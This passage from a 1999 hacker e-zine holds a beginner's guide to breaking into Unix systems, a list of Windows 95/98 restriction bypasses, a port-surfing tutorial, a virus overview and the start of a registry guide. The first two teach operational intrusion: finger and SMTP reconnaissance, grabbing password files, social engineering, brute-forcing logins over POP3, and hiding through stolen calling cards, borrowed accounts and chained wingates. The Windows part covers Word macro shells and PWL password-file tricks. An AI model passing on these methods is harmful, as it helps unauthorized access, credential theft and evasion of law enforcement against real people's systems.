look that up. To find hacking info we head for the net. Now my personal
favorite is www.altavista.com, I find that to have the most complete
listing among all of the ones you see these days. Some things you wanna
look up are hacking, phreaking, hacking texts, and computer security.
Among these topics you will find good information and other things that
are complete garbage. Just sort through that info and pick what you are
most interested in. I do suggest though you don't bother with proggies.
They are usually nothing more then a waste of time. The good stuff will
come in the form of text files. Read everything you can get your hands
on.
IRC
Now IRC can be fun or it can be dumb, its what you make out ofit. If
you go on there occasionally to ask a couple questions, share some
info, or to just hang out for a bit while your bored everything is
fine. If you go on there though all the time just to argue your
wasting your valuable time. Your best bet is to stay relatively
partial. Why bother with flame wars that end up with nothing but wasted
time that could have been better spent. Most people on there are bored
and have nothing better to do then bother other people so before you
sink to there level just think about that.
USENET
USENET has become a little worse in a the past few years. It has a lot
of spam and a lot of dumb posts. Though once in a while you will see
some intelligent Q & A, its a refreshing to see a break from the usual
garbage once in a while. Now if you use newsgroups correctly this is a
good way to get a question answered in within a day or two. Its all
about not asking the wrong question. Read the groups FAQ's before
posting and in all questions to anything relate to hacking stay away
from AOL, Hotmail, and "How do I hack?" questions. These will just
result in some flaming, thats it.
Fitting In
This can easy or this can be hard, it all depends on your personality.
Some people just have a way about them that will piss off anyone. First
thing is not to act like a newbie, attaching "I am a newbie" to each
question is dumb. Thats not to say though you should act like you know
more then you do either. There is a thin line you should walk. Also
like I mentioned before there are some questions that should not be
asked. Questions asking for someone to teach you to hack? Also
questions about Hotmail and AOL are looked down upon as well. Not to
mention people feel anyone who pays the high fees aol charges for
shitty service is a complete moron so if you are using AOL expect some
teasing for using that. Another thing, many hackers don't like Windows
and will laugh at you for running it. I feel both Linux and Windows
come in handy so I always have some sort of linux access along with my
Windows computer. I really suggest though you watch the conversations
wherever your chatting or posting to get a sense on what is going on.
Above all try not piss off anyone.
III. Getting Started
How do I find good boxes to mess with?
Well when you talk to some people this seems to be the biggest
problem. I personally never found it a problem but I figured I should
include this for those who do have trouble with it. Interesting
computers, as well as phones for those inspiring phreaks, can come from
everyday life. You may notice a local business is online and wonder
what about what the system is and what it does. When your out and about
keep your eyes open for things that may pose interesting. For instance
while checking out some good UNIX books (which by now I hope you all
have done) I took it upon myself to sit down at one of their computers
and mess around trying to get a non internet computer to get on so I
could check my mail. In the process a nasty librarian came over to me
and reprimanded me. I of course played innocent but when I got home I
said to myself "Wonder what these people are holding on to so tightly".
So I fired up the my computer, headed for the internet, found there
website, then looked at the ip address there card catalog was on from
there found a nice old UNIX V system which suprised me since all their
user computers are running Windows 95. In the end although I did not
mess with it too seriously, but I found it allowed routing mail which
meant I could forge mail from them, not to mention it was a good server
which did not show my IP in the header. Now if I did not find it on the
internet I would turn to the old fashion way of finding computers among
other things, exchange scanning. This is usually done with the aid of a
program called a wardialer. This is simply the process of dialing every
number in a exchange in hopes of finding a carrier. I was shocked at
the cool things you can find while doing this. I am currently thinking
of writing a seperate article on this since its a very broad subject.
The fact of the matter scanning is illegal in some areas and can get
you in hot water with your local phone company which I have had some
close calls with. The message here is be careful. Look up some info on
this before trying it. As for other methods for finding computers there
are programs like wardialers which scan a large range of IP's for
servers. I have never used one of these before and quite frankly have
no desire to either. I will say though that a freind of mine found some
interesting things by doing this. Now one very good way to find good
things is to look at where e-mails come from through the full headers.
If somebody mailbombed you or forged e-mail to you look on the bright
side they pretty much showed you a anonymous e-mail server. The final
way and by far my favorite is to look up a city or area code and
explore its computers and phone numbers. Pick your home town if you
like although I do not reccommend it. My favorite spots are the towns
of former residences which I resided at and also vacation spots of the
past or future. Being creative is what will help you. Thats what
hacking is all about.
Making the Connection
Now this is probally reveiw for most everyone but for the few who have
posted asking this here it is. Lets say we wanted to hack target.edu, a
university in Fakeville, USA. Now lets suppose we already had an
account on the system, a UNIX shell account. To connect we want to
telnet into port 23, the telnet port. This would be where we'd be
presented with a login screen. Now if you want to hack an account thats
the place to begin. Now the first way and by far the best, is to telnet
out of a UNIX shell account which by giving this command:
Telnet target.edu 23
This command given at the command prompt would give you the login
screen. Now lets suppose you can't get a UNIX shell account, nor do you
have any kind of UNIX on your computer. In the case your running
Windows we will use the telnet client shipped with Windows. We get to
our telnet client by simply going to Start --> Run --> telnet. From
there we would go to Connect --> Remote System. Now for host we put in
target.edu and for port, 23. For term type I use Vt100 but its personal
preference I suppose. Now if we wanted to telnet to another daemon
besides the default telnet port we would type in the port that daemon
runs on. Heres a freebie, port 25 is Send Mail Transfer Protocol (for
info on it download my article "The Wonderful and Evil World Of E-mail"
available on my website). I strongly suggest you get yourself a UNIX
port list available on most hacking sites on the web. Analyzing
This is where the bulk of the work comes in, finding out everything
you can find without actually entering a username and password. Now
remember while gathering info you don't want to make the system
administrator too nervous or he may pick up the good old telephone and
have a little chat with your ISP. ISP's are quick to throw your ass off
especially if its a big service. Now the first thing to do is find out
what ports a computer has open, for those who don't know ports are
where various services run. Now there are two ways to do this, you can
do a port scan or you can port surf by hand. Now if you want to keep
things quiet your best bet is to do it by hand. If you try to automate
it then your asking for trouble because all those connects will show up
in the logs. Now if you don't give a rat's ass about the system
operator knowing then start up the port scanner and go take a walk.
When you come back you will be looking at a list of ports. Now when
your looking for ports a handy dandy port list will come in good use.
That should be numero uno on your equipment list. After time you won't
not even need it. That time is not now though, you are still
inexperienced so I suggest printing it off and keeping it in a spot you
won't lose it. Now there are many services which will give you info but
my favorite is port 79, finger. With this little service you can gain a
wealth of information such as usernames, info on users (perfect for
social engineering), and times when last logins occured. So what you
should do is take a look if port 79 is open. It has become rarer, but
by no means is it extinct. I still find it often. Now keep in mind you
will not see what your typing and you will only get one shot before it
disconnects you. Some of the first things you can try with finger are
common names. Trying john, mary, paul, joe, jane, and so on. This can
sometimes produce quite a few valid usernames. Along with that,
depending on the version of finger and how trusting they are, you can
get other info. Full names, addresses, phone numbers, e-mail addresses
and things along that line are out there for a the taking. Now you can
also try some other things with finger such as fingering root, the
superuser account of UNIX systems. This will tell you if he is
currently on or when was the last time he logged in. It may also give
you some other interesting details. Try fingering accounts like bin,
system, manager, @, 0, @target.com, and anything else you can think of.
Now I suggest you turn on logging so that you can reveiw all this info
at another time and figure out what will be useful.
Also another little thing that can help you figure out valid usernames
with out filling up those login logs is the SMTP daemon on port 25,
most likely Sendmail. Using the command "vrfy" you can check to see if
a certain user exsists on the system. Some things to try are common
names, guest, and anonymous. Make freinds with SMTP, it will be quite
helpful in some cases of getting into systems.
What you may also want to do is check to see if they allow for
anonymous ftp. If it is login as you would any anonymous ftp server (if
you are not familiar with ftp go to a search engine and look up "Ftp
Help"). Now if you get in I suggest nosing around the /etc directory.
This holds the password file in a UNIX system. Download all the files
from there and take a look at them. The one you really want to look at
is passwd. Now I know you may have read old texts and think you will
just download it and run a password cracker on it and then have
superuser access. Fat chance. Most password files are shadowed meaning
in the place of where the password should be you have some garbage
character there (*, $, !, etc). If by some freak chance you do get one
that isn't shadowed get a hold of a UNIX password cracker and
dictionary file. Then use those to crack the password file. This is
doubtful though but it doesn't hurt to try. While in FTP check out
everthing you have access too. Sometimes you'll find some info that
could be useful, not to mention I have heard some morons upload stuff
they would attach to an e-mail to anonymous ftp since it is quicker. I
never came across that but I bet it be nice to. And the last thing to
do before you log off is see if you have write access. Try to upload
something to anonymous ftp and if it works then note that because it
may be possible to do some interesting exploits with it. More likely
you will get a access denied message. Exploitation
Ok you gathered all the info you could on this server. You analyzed it
over and over. You know every port that is open and you know what
service it is running. You know each peice of software and version they
are running. Once you have all this info you have many ways this can
go. Usually your gonna see your breakins to systems by either two ways.
Number one, and my favorite, user and system administrator stupidity.
Number two and also a very exciting thing is problems with the software
and misconfigurations. Now lets talk about the first way. Back in the
old days this was the main way to get in, the easiest at least. You'd
call up some dipshit of a user, say that his system was going to crash
if you didn't get in there to correct a bug. Now that the world is
shifting towards a more computer literate society people are wising up
to these things but thats not to say there aren't still stupid people
out there, if you don't believe me look at the hype about the last
major virus, Melissa, which was nothing more then a macro that crashed
a few mail servers. People shit their pants over this. This just goes
to show you that people get scared when they don't understand
something. Now there are some papers out there on social engineering,
but let me say right now no article will make you an experienced
bullshit artist. That only comes with practice. Now besides for getting
the users to tell you their password you can attempt to guess their
password. Now you already have some info on the person. You should know
there gender and name from finger information. Also if you checked to
see if they have a personal web page you may know everything about that
person from their favorite cearal to what they hate in society. Take
this info and create a list of common passwords this person may choose.
Now when you consider your subject remember that your giggly secratary
is going to pick words like love and honey while your horny system
operator who hasn't seen light is going to be picking words like
blowjob. Now this may sound funny but every girl I know picks cute
little passwords. When you make your list you have to consider your
target.
Once you have your list together you are going to attempt to brute
force the password. Meaning educated guessing. I also suggest if you
know they have e-mail on the system you attempt to do your brute
forcing through port 110, POP3. POP, post office protocol, doesn't stop
you after three tries. This is helpful in reducing the logs a bit. When
you do this you also better be using one of the protection methods
listed below. No matter what people tell you jail is no fun and Big
Dick Bubba is not gonna be gentle with you either.
Now as I said before there is a second method which is a little more
advanced and by far more practicle. This is finding exploits in the
software or services a server is running. The best example is Sendmail,
the SMTP daemon. This peice of work has so many holes its not even
funny. I strongly suggest you read up on sendmail exploits because
these are very common to find. Throughout the years sendmail has
compromised root, password files, and other such security risks. If
your target server is running sendmail I suggest you check with either
www.rootshell.com or some sort of search engine to see if its an
exploitable version. Other daemons which have fallen prey are IMAP,
fingerd (as if giving user info wasn't enough), and POP (not limiting
the amount of bad logins sound safe to you?). Check up on all the
software versions and see what you turn up with. You see its all about
how much you can learn, how much information you have. When you check
out a system always keep your eyes open. Now one of the weird and crazy
things you have to do is THINK! There is no complete textbook method to
hacking. No secret codes or methods that will always comprimise every
system. This is an important thing to remember. Now as for exploits
besides for checking with rootshell.com I also suggest you subscribe to
any security mailings you can find. Keep up to date on these days
because new techniques come out everyday.What To Do Once Your In
Ok you were able to get into a system, either you have a user or
administrator account. Now depending on the system both may be very
interesting. Once you are in, you hopefully understand how to get
around in the system. If you don't then I recommend you find out what
the hell you are doing before you mess something up. Commands like help
and man will get you around but further help can always be obtained by
searching online. Look around and see what you have access to. Take a
look at what directories you have access to and wether you have read or
write access. Also check to see what e-mail is lying around. You may
even have access to a web directory. Now you have access to many things
and you are very powerful at this point. Now something that runs
rampant with newbies is a surge of all that power and they become
destructive. Dance, sing, and rejoice but do not screw things up
without thinking it through. This is where ethics come in, you have to
be responible or you are no better then the media stereotypes. So as a
final word on it be careful.
IV. Protection
*67
This is one of the most simple and easiest way to start protecting
yourself yet so many hackers and phreakers don't get it. For instance
the guy who spread the Mellissa Virus thought he was being slick
because he was using a stolen AOL account to do it. Yet the guy didn't
even make it difficult for AOL to trace him by dialing in with *67.
Remember most ISP's will keep records of where the call came from. When
you are dialing anything that isn't toll free you should most
definetyly use it. With the widespread of Caller ID its become a real
nessicity. *67 is free to use so why not always use it. Its only
takes three extra seconds at the most out of your life, so be smart and
use it. This is not to say that it will be the one thing to save your
ass, it won't. It just
makes it a little bit tougher. Now if you are
calling up a toll free number (800, 888, or 877) don't even bother with
*67. They have something called ANI which will automatically give them
your number whether you *67 or not. As a precaution though do yourself
a favor and do it.
Calling Cards
Everyone has had experiences with prepaid calling cards and knows how
they work. These little babies are quite handy when it comes to hacking
and phreaking. One reason is because you can easily steal them or card
them and not get caught. The second though is most of the time it won't
show your home phone number since your dialing out of the company who
owns the calling card. Using these cards can be a added peice of
protection but please remember the calling card company keeps logs and
if requested it is possible to trace it back to the phone you used, so
your best bet is to use this with other methods we are talking about
today.
PBX's
This is one of the best ways to protect yourself and get free calls at
the same time. A PBX, Private Branch Exchange, is a phone network set
up in offices so that the company doesn't have to pay for a ton of
lines, instead just have a few lines going in and out and those are on
the PBX. You know when your at school and you have to press nine to get
an outside line, well thats a PBX. Now sometimes these PBX's have
outside access so there employees don't have to get charged. Usually
you will find one of these while scanning and it will identify itself
by a long tone or a distant dial tone. These are for the most part
gaurded by a code. For some indepth info on hacking these I suggest you
do a search for "PBX hacking". Still use some other protection methods
in conjunction with this.
Borrowed Accounts
Alone this method is shit because they will trace it back to the phone
line if you do anything really bad. Though if you do some mild hacking
and use this with some other methods it can be quite good. You don't
have to worry whether you will get kicked off your ISP since its not
really yours anyway. Also it can be used to impersonate other people on
IRC if you have reason to. Now if you plan to be doing something don't
do it with your own account because when they check the logs they will
see your name, address, and phone number and that will be it. So as
always be catious.
Public Terminals
Now you will either love or hate this method. It seems most public
places are getting public terminals. Libraries, schools, airports, you
name it and they are starting to offer it. These can offer good things
such as anonmity, but there are drawbacks. This is the outside world we
are talking about. You will have to deal with nosy people, librarians
are really a pain in the ass (school librarians are the worst). If you
use a public terminal there is a good chance there will be security in
place that will prevent you from doing a lot of things, this goes twice
if you are doing stuff at school. So although you have the anonmity,
hiding behind the innocent who use the computer to chat in Yahoo! or
AOL. Just try not to create too much attention to yourself while doing
this either or people will be on your back about doing anything.
Wingates
These are one of the best methods of protection while hacking on the
internet. These are abundent and easy to find by either scanning or
looking at the bans on Undernet for exploitable wingates. These are
used by telnetting in and getting a prompt like, Wingate>. From this
you can type in a sever and port number like this, target.com 23. That
will telnet you to target.com and if you want added protection telnet
to another wingate and telnet from that. You can string together
several wingates and hack all you like without getting caught. This is
timely but its worth it to keep your ass out of jail. Outdials
These are a thing of the past but supposedly there are still some
around. I will say the alt.2600 FAQ's outdial list doesn't work so
don't waste your time. Outdials are used to dial out of UNIX systems
meaning you can dial anonymous and free to one of the few BBSs still
around or too a computer dialup on the other side of the country. If
you hack a shell and it has a program called Kermit you are in luck
because you will be able to do this. If you really want to hunt down a
outdial get a text on it. Rememeber on the internet you have
information as fast as you can type so just look it up.
V. Conclusion
Behaviour
If you have read through this and you are new you probally have gained
quite a lot of information and hopefully I have peaked your interest a
bit. No one is going to go out and hack for you so if you really are
dedicated then get out there and do it. As you get out into the
cyberworld be aware though no one like a asshole so act with integrity
and smarts. Try to be nice even to those ignorant bastards asking for
punters. Try to explain them thats not hacking and what hacking is. If
you can't though just tell them to get lost. Just try to mantain some
of those manners mommy and daddy taught you and things will be fine.
Closing
I bid you good luck in your hacking career, may it be long and bust
free. Use your head in all situations and listen to the advice I have
given you. As a last peice of advice check out phreaking, phone
hacking. The skills you learn come in handy for hacking. Last but not
least have fun and learn something, thats what this is all about. If
you didn't like this article I could care less. Get all the my texts
and other information you are looking for at my website
http://mobboss.dragx.cx
By The Mob Boss
Co-edited by TheGuy
This has been a publication written by THE MOB BOSS, he is in no way
responsible for the accuracy or results from the use of info in this
article. Anything done is totally done at the users discretion. THE MOB
BOSS in no way or form supports, aids, particapates in the act of
criminal hacking or phreaking. Any ideas, beliefs, and information
gathered in all publications published by THE MOB BOSS is strictly for
informational purposes only. THE MOB BOSS copyright 1999 all rights
reserved.
:..::..End Of File..::..:
:..::..File 5 Of 14.::..:
:.Windows Security Holes:
:..::..By NeonBunny.::..:
<*> Windoze 95/98 Security Holes
+----------------------------+
Most schools and businesses are using Windows 95/98 yet most texts
concentrate on obscure operating systems so here is an insight on how
to hack the O/S from hell! Some of this stuff is aimed at newbies so
don't flame me, you never know, you might just learn something!
The major way to gain access to areas your not to (passwords still
apply) is to use the "common dialogue box open/save dialogue" or in
English, the box where you save or open your work in nearly all
programs. This dialogue box includes a box for you too enter the
document path, by enter the name/address of what you want to access the
files section will normally display what you want, bypassing Windoze
security. An example to this it to get to network computers by typing
"\\server" will give you a list of the shared folders on the computer
called "server". By using this method you can use the top pull down box
to work your way up the network tree to a full list of machines.
Another use can be to gain access to drives which you have normally
been banned, since it is hard to set up read and write access to local
drives with Windoze, this can prove invaluable. By typing "c:\*.*" you
can gain access to the local drive even if the sysadmins don't want
you. Similar tricks can be achieved with Netscape Navigator and
Internet Explorer.
Microsoft Word is a great hacking tool and yet it's badly set-up on
school networks all over the world. The major problem with Word is that
it's too powerful and includes it's own programming language. By using
this you can run any program on the network such as Explorer, Registry
Editors etc. To use this with Word 95 simply go to the "Tools" menu and
choose "Macro" from here just type a new name and press enter. This
will through you into Word Basic, now all you need to do is the type
between the "Sub MAIN" and "End Sub" lines
shell "c:\windows\explorer"
Clicking on the play button will start up Windoze explorer for all your
hacking needs.
The real fun with good old macros is that they occasional bypass the
Windoze security settings, allowing you to run Policy Editor even if
you are not allowed to run it normally. So you can then modify your
settings to give you access to Registry Editing Programs and then shell
Regedit the same way.
By deleting the appwiz.cpl files it's possible to stop the create
shortcut wizard, if this happens then the .lnk file is still created,
simple right click it and choose properties to modify the shortcut to
point to your favourite executable/drive. If this doesn't work then
create a new file (in away way you see fit) and rename the file from
.??? to .lnk and then choose properties.
Hitting Control + Esc at a normal login screen on Win 95 will bring up
Task Manager, from here you can run explorer to bring you a desktop or
any other executable fun. This can (and is on RM networks) prevented by
adding
taskman.exe=<restricted>
to the [boot] section in system.ini.
It's often easy to access forbidden programs by right clicking the
desktop (and other places) and choosing "New" and then the file
associated with your program, it'll only run certain programs but it's
a nice way to get to NotePad etc. quickly.
By browsing though a Common Dialog Box (see above) you can select
executables and (assuming that QuickView is installed) choose QuickView
from the right click menu, from here choose the icon in the top left of
the QuickView window to launch the program.
If Windows 95 has IE4 or Windows 98 (with IE4 built in) it is normally
possible to create new toolbars. Right click the start bar, choose
Toolbars and choose New Toolbar. From here you can enter the hidden
drive letters and get a full directory listing on the start bar.
It's almost impossible to remove the Help option from the start menu,
open it up and do a search for "Click here" which will bring up a list
of help files which provide a button that'll let you launch certain
programs.
Hitting F8 when Windows say "Starting Windows 9X" (or simply after the
BIOS appears to be finishing off) will bring you a boot menu. From here
you can choose Command Prompt and Safe Mode amongst other such goodies.
If this doesn't work then modify the file "c:\msdos.sys". Within this
file is the setting which disables the "Starting Windows 9X" option
menu, modify the "BOOTKEYS=0" line to read "BOOTKEYS=1" to reap the
benefits of this hole.
Running the group-converter program (c:\windows\grpconv.exe) brings
back the shutdown command on the start bar. This program can also be
used to create start menu items from the included .grp files in the
c:\windows\ directory, just run the .grp files or on some machines, run
the grpconv for all of them.
Windows stores nearly all passwords within a single file which is
normally the called "c:\windows\USERNAME.pwl" although encrypted all is
not lost. The encryption uses the username to encrypt the password. A
common way into the system is to delete the user's password list and
then login as the user where Windows will prompt you for a new
password. If you rename this file instead of removing it and then login
as the user the same effect will take place. Once in, you can rename
the password list back and now use all of the user's stored passwords.
This can prove useful on a Windows 95 network where all folder
passwords that are chosen to be stored are kept in the password list.
As a result of this, you can rename the admin PWL and then rename it
back to gain access to folders which would normally be password
protected, you can also remotely administer computers and in fact do
anything assuming that the lazy sysadmin choose to save the password.
Using old Windows programs can get through restrictions set up with
policy editor, since they don't use the rundll32 APIs (I think that's
correct) they don't have hidden drives etc. Try fileman.exe and
progman.exe for examples of this.
Windows, like nearly all O/Ses, use Shells, the usual one is
explorer.exe which can't be removed but Microsoft saw fit to use the
one exe as the shell and the file-explorer, duh! Other shells include
Internet Browsers, these don't follow the Windows drive restrictions
etc. since they can run independently (usually because they're designed
to run on more than one platform).
If you're having problems getting into restricted areas of the desktops
then try creating folders names XXXX.{NNNN-NNNN} where XXXX is the
folder name and NNNN is the numbers, by using the below list this will
get you access to some areas of interest:
E.g. Printers.{2227A280-3AEA-1069-A2DE-08002B30309D}
{208D2C60-3AEA-1069-A2D7-08002B30309D} - Network Neighborhood
{2227A280-3AEA-1069-A2DE-08002B30309D} - Printers - works
{20D04FE0-3AEA-1069-A2D8-08002B30309D} - My Computer
{21EC2020-3AEA-1069-A2DD-08002B30309D} - Control Panel - works
{3DC7A020-0ACD-11CF-A9BB-00AA004AE837} - Internet - sweet!!
{645FF040-5081-101B-9F08-00AA002F954E} - Recycle Bin - works
{85BBD920-42A0-1069-A2E4-08002B30309D} - Brief Case - works
{871C5380-42A0-1069-A2EA-08002B30309D} - Internet Explorer - a link
{a4d92740-67cd-11cf-96f2-00aa00a11dd9} - DUN - Doesn't work
{D6277990-4C6A-11CF-8D87-00AA0060F5BF} - Task Scheduler
We've seen how we can bypass drives restrictions through the common
dialog box but similar can be done with explorer on some early
versions of Windows, take a peek in the tools menu and see if there's a
go... option, if so simply type in the drive and away you go, explorer
even seems to unhide the drive for the rest of the session!
Instead of pressing cancel at the login screen why not try
CTRL+ALT+Break, ALT+F4 or CTRL+ALT+Scroll Lock which also does the same
thing.
If the FIND command is needed there's no need to start hacking your way
into the admin account, just hit CONTROL + ESC (to bring up the start
menu) ESC (to hide it again) F3 (to bring up the find dialog) now that
was hard wasn't it!
NeonBunny
the_neon_bunny@hotmail.com
:..::..End Of File..::..:
:..::..File 6 Of 14.::..:
:.Portsurfing Computers.:
:..::..By Darkflame.::..:
<*> PortSurfing
*darkflame@zetnet.co.uk*
The Introduction
I have chosen portsurfing as my next topic of discussion because I feel
that it is a fairly easy, but possibly rewarding skill that takes
advantage of the individual's perception, and imagination. It (in it's
basic, un-tooled) form requires no programs that you don't already have
on your machine (be it Unix or Windows).
There are some key concepts you have to understand for this text to
make any sense to you. Well as much sense as a text by me can make :).
They are things you will probably have heard of before but some may
not, so have a skim, and if you recognise them skip to the next part.
Port (Virtual) - A software port that is used for a specific
purpose. A daemon runs on this port, offering
services to any user who drops by.
Daemon - A piece of software which manipulates TCP/IP
and offers a particular service to the user of
the port it's designed to run on.
TCP/IP - Transmission Control Protocol/Internet
Protocol. (See my next text for details)
Main Text
There are almost an infinite amount of ports available, but some are
more well known than others. For example, when contacting a web page
your browser contacts port 80 of the remote computer, and port 21 when
looking for an FTP host.
You do not need to connect to a specific port, when the client already
has a preset port:
Netscape Navigator -> Web Page
WS_FTP -> FTP Host
Your telnet client can also connect to these, and any other, ports,
even if they are not intended to. This is not illegal, and provides you
with a whole new perspective of the computer you are connected to.
These ports can be found using a program like SATAN or SAINT for Unix
and Linux. These programs check for open ports and exploitable daemons
from there onwards.
But as I professed that this would be a text where I didn't expect you
to have any other programs than the ones already on your machine. I
will show how this can be done manually.
Now you select your target host (www.fubar.com will be used for
demonstration purposes).
A port extremely well known for crackers is Port 79 ( finger port).
This port allows you to find out information on users on the system.
Early versions of a finger program are extremely easy to crash, and
also have a tendancy to either run from root, or make calls to root.
(I'm assuming you know what root is). So in theory, if this program
just happened to crash while you were sitting there, you may just
happen to find yourself lying on root. I'm not saying that you should
do this, in fact I'm saying you shouldn't because its against the law.
To see if your target host www.fubar.com had the finger port enabled
you would use the command from your Unix shell or DOS prompt:
telnet www.fubar.com 79
Hopefully you would get the message:
Connected to www.fubar.com
>From here, you would try and coax the daemon into telling you how it
takes it (input that is).
You would do this by typing:
man - (the man command on UNIX gives you online help for a program
? - (trying to get the machine to show you what commands it takes)
help - (self explanatory)
One of these should work. If they don't then try other keywords that
come to mind, and see what kind of response you get, this is where you
are left to your own initiative.
You could also telnet to port 15, which shows all the network
connections made by your host. If you think about it, you can probably
see how port surfing leads on to hundreds of possible break ins. Lots
of daemons have buggy software, and smaller servers may run these as a
money saving option. You can see what port software is exploitable from
www.rootshell.com, but you should see if you can find out information
on the software running. For instance if you saw that www.fubar.com was
running ushttp v1.0 (fictitious) on their web port.
You would go to www.infoseek.com and do a search for 'ushttp://'. From
here you could have a look at the software's page, and see how
professional it looked, how much it cost etc. All this should give you
a clearer picture about the system you are hacking, and knowledge of
the system you are hacking is vitally important. You should see how the
software is made up, and how it could possibly be manipulated to allow
you into the host.
Please try to refrain from crashing the port to leave you on root
because this is considered cracking, and to me it is too 'script
kiddie' ish to be regarded as hacking.
Hopefully with a little bit of thought you can see how you can expand
from this information, to match the system you are hacking. Dodgy
daemons and interesting ports are very popular ways of gaining access
on a machine. Port surfing is a very good way of achieving lots through
a simple technique.
List of common or standard ports:
Port number Service
7 echo
9 discard
11 systat
13 daytime
15 netstat
19 chargen
21 ftp
23 telnet
25 smtp
37 time
39 rlp
43 whois
53 domain
70 gopher
79 finger
80 http
110 pop
119 nntp
443 shttp
512 biff
513 rlogin
who
514 shell
syslog
520 route
There are more but these are the most common ones. Remember:
Get onto your computer, and call upon your telnet program. To connect
give the command:
telnet <hostname> <port number>
When you get a response, it's all down to you from there on in.
--
darkflame@fuckyou.co.uk
http://welcome.to/digital.insanity
'The roots of education are bitter, but the fruits are sweet'
:..::..End Of File..::..:
:..::..File 7 Of 14.::..:
:.::..The Virus File.::.:
:..::.:.By HitMan.:.::..:
Viruses:
-=-=-=-=
I for one can start by saying that most of us have come across a virus
at some stage in their life. It may have been yours or your mates but
it still means that you know what I am talking about. When I was about
seven or eight years old I came across my very first virus 'RIPPER'
and this by no means was a joke. It completely messed up my life by
infecting my disks and destroying my programs. It was a pain in the
ass. But since the day after that experience I have now protected
myself and I have intercepted such viruses as 'RAPE' and 'MESSIAH' etc.
The list is endless but basically this might clear up some of those
so-called newbie questions or just simply a nice little file for your
collection.
By far the most common method of transmission for viruses has been the
floppy disk (90% of all virii have been transmitted by a floppy). In
order to stop any infection companies such as McAfee (now called
Network Associates) have brought out virus protection but because of
there being 13 new viruses discovered every day all of the protectors
lose the effect. The worst thing about the protectors is that as they
are a needed program, they consume memory which in turn will decrease
the power of your machine. This is a big piss-up if you consider that
they are not even guaranteed to find the fucker. With that in mind many
people disable the protector/scanner which leaves them wide open for
the pray of 'abusive crackers'.
A problem that has come up is that when converting your drive to FAT32
with Windows 98 the conversion changes your partition table and your
boot record. As these are just a couple of things that the scanner
looks out for and tries to prevent it causes a very big upset with the
scanner and the scanner will take none of the grief Windows 98 tries to
put it through and starts putting up all sorts of blocks. When you
disable the scanner to install Windows 98 and when it is installed you
make the program active again it will then prompt you if you want the
scanner to fix 'corrupted' drive. Which in these cases will overwrite
the old table onto the new and cause chain reactions on most of the
programs on your computer. To put it in plain English "Do not permit
the change of overwriting the table".
BIOS Viruses:
-=-=-=-=-=-=-
Motherboards frequently store the BIOS in a type of memory known as
flash memory. This is EE-ROM, or Electrically Erasable Read Only
Memory. Circuitry on the motherboard can erase the content of the BIOS
and then reprogram it. Motherboard manufacturers use this technique so
that it's possible to upgrade the BIOS easily, with out having to open
the case and replace the ROM (Read Only Memory) chip.
However there is a small part of the BIOS that is protected against
accidental erasure. This is known as the boot block and it's their in
case anything goes wrong with the procedure to reprogram the CMOS, you
would end up with an unbootable machine. So, the boot block contains
enough code to allow a new BIOS to be loaded and programmed from a
floppy disk or other source.
Clearly, the potential danger is a virus could attach itself to the
BIOS itself - by reprogramming the flash memory - or simply erase the
BIOS and thrash your system. Unless you have the special floppy disk at
hand with new BIOS code that you can load from the boot block, your
system would be as fucked as a dodo.
However reprogramming the BIOS flash memory is not as straight forward.
There are two techniques that a virus author could use to achieve this.
If the author knows the hardware design of the motherboard, then the
virus can include the specific instructions to erase and reprogram the
flash. Alternatively, if the BIOS itself contains the code to erase the
Flash - and some do - then the virus can be written to call these BIOS
routines.
BIOS MAP (on average)
************************************************
* * * * *
* * * * *
* Flash * System * Self * Others *
* Bios * Set-up * Test * 35 % *
* 20 % * 30 % * 15 % * *
* * * * *
* * * * *
************************************************
\ /
\ /
\________ 65 % ___________/
Although this may vary from computer to computer it is based on an
average so don't blame me if it's not down to the decimal point.
Hoaxes:
-=-=-=-
Almost as bad as viruses themselves, in terms of the wasted time,
bandwidth and hard disk space that they cause, are virus hoaxes. These
have been circulating ever since e-mail was invented and before that
on bulletin boards. They are cleverly designed to grab your attention
with a warning of a virus spread by e-mail that can cause severe
catastrophe. Such dire happenings as erased files, corrupt hard disks,
dying pets and toilet seats being left up are frequently cited.
Gullible readers are then further ensnared by an attempt to give the
warning authenticity, by quoting an authority that the reader might
believe, such as Norton or Microsoft. Finally, public spirited
recipients are conned by an appeal to spread the warning to prevent
your closest friends and family from being infected.
To give a example of a typical virus hoax message: "There is a computer
virus that is being sent over the Internet". So basically if you see a
newsgroup message saying "A Moment of Silence", don't read the message,
delete it immediately. As this type of file could be like some viruses
that completely rewrite your hard disk, sending everything on it to
hell. This would only work if the sender posted in HTML and included
some hostile Java bug. So if you really want a piece of advice tell
your mates about this orally not through e-mail as that way they might
think it's one of these viruses. Look out for one of the common ones
such as 'GOOD TIMES' which has being circulating for several years now.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
To get a Dr. Solomons CIH virus detector and removal go to:
http://www.drsolomon.com/vircen/valerts/win32cih.html
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
__ __ __ ________ ___ ___ ____ ___ __
| | | | | | |__ __| | \ / | / __ \ | \ | |
| |_| | | | | | | \/ | / |__| \ | \ | |
| _ | | | | | | |\ /| | / ____ \ | |\ \| |
| | | | | | | | | | \/ | | / / \ \ | | \ |
|__| |__| |__| |__| |__| |__| /__/ \__\ |__| \___|
[-=http://hitman.it.8m.com=-]
[-=vectra500@geocities.com=-]
:..::..End Of File..::..:
:..::..File 8 Of 14.::..:
:..Editing The Registry.:
:..::.:.By Cyborg.:.::..:
<*> Introduction
The Registry is a central database that is created by Windows 95
during installation. The entries in that database consist of the
hardware, software, users, and preferences data for a single computer,
or any computer on a network. Whenever the user makes changes to the
Control Panel settings, File Associations, System Policies, or
installed software, the changes are reflected in the Registry.
Ok, if you have ever read any files dealing with the Registry before
you'll notice the first thing the author says is back up your Registry.
I personally, couldn't give a shit, if you have to reinstall Windows it
is of no consequence to me.
<*>----------<*>----------<*>----------<*>----------<*>----------<*>
^ My Computer ^
\ /
-----
|
|
|
|
|
/-------|-------\
/ | \
/ | \
/ | \
/ | \
----- ----- -----
/ / / \ \ \
^ Hkey_Classes_Root ^ Hkey_Current_User ^ Hkey_Local_Machine ^
^ Hkey_Users ^ Hkey_Current_Config ^ Hkey_Dyn_Data ^
<*>----------<*>----------<*>----------<*>----------<*>----------<*>
<*> Registry Editor
You can find the Registry Editor in c:\windows\regedit.exe or whatever
non standard name you chose as your Windows directory. Copy that onto
a backup disk if it pleases you to do so. For future reference you need
only choose Run|Regedit if you only want to run the program. Once
